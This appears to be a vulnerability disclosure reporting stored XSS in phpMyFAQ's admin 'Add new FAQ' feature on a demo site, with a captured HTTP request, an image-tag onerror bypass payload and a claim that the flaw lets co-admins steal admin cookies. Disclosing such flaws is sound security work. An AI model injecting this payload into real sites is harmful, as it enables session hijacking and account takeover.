Description

Stored XSS in "Add new FAQ" feature via inject XSS payload in the answer at the following https://roy.demo.phpmyfaq.de/admin/?action=editentry

Steps

1- Login as admin and Go to the following URL https://roy.demo.phpmyfaq.de/admin/?action=editentry to add a new faq 2-Enter the "Question" and "Answer" values and intercept the request

POST /admin/?action=insertentry HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=0d93a6d553659b592de5960477f2dcf3; phpmyfaq-setup=db7f78de80ee8152a536f2e90b38c1ff; cookieconsent_status=dismiss; pmf_sid=53
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 535
Origin: https://roy.demo.phpmyfaq.de
Referer: https://roy.demo.phpmyfaq.de/admin/?action=editentry
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

revision_id=0&record_id=0&csrf=bc90de34174f4df1482c5213efba2f94863687d1&openQuestionId=0&notifyUser=&notifyEmail=&question=&answer=<!DOCTYPE+html>
<html>
<head>
</head>
<body>
<p>ssssssssssssssssssssssssssssssssssssssssssss</p>
</body>
</html>&rubrik%5B%5D=1&lang=en&tags=&keywords=&author=Admin&email=demoadmin%40phpmyfaq.de&grouppermission=all&userpermission=all&restricted_users=1&changed=&notes=&recordDateHandling=on&date=&active=no&solution_id=1000

3-Delete "answer" parameter html code and type any bypass payload <img only=1 src=x onerror=alert(1)> 4-Send the request and publish it to see the alert

Impact

So any co admin or support user can inject the payload and steal admin Cookies .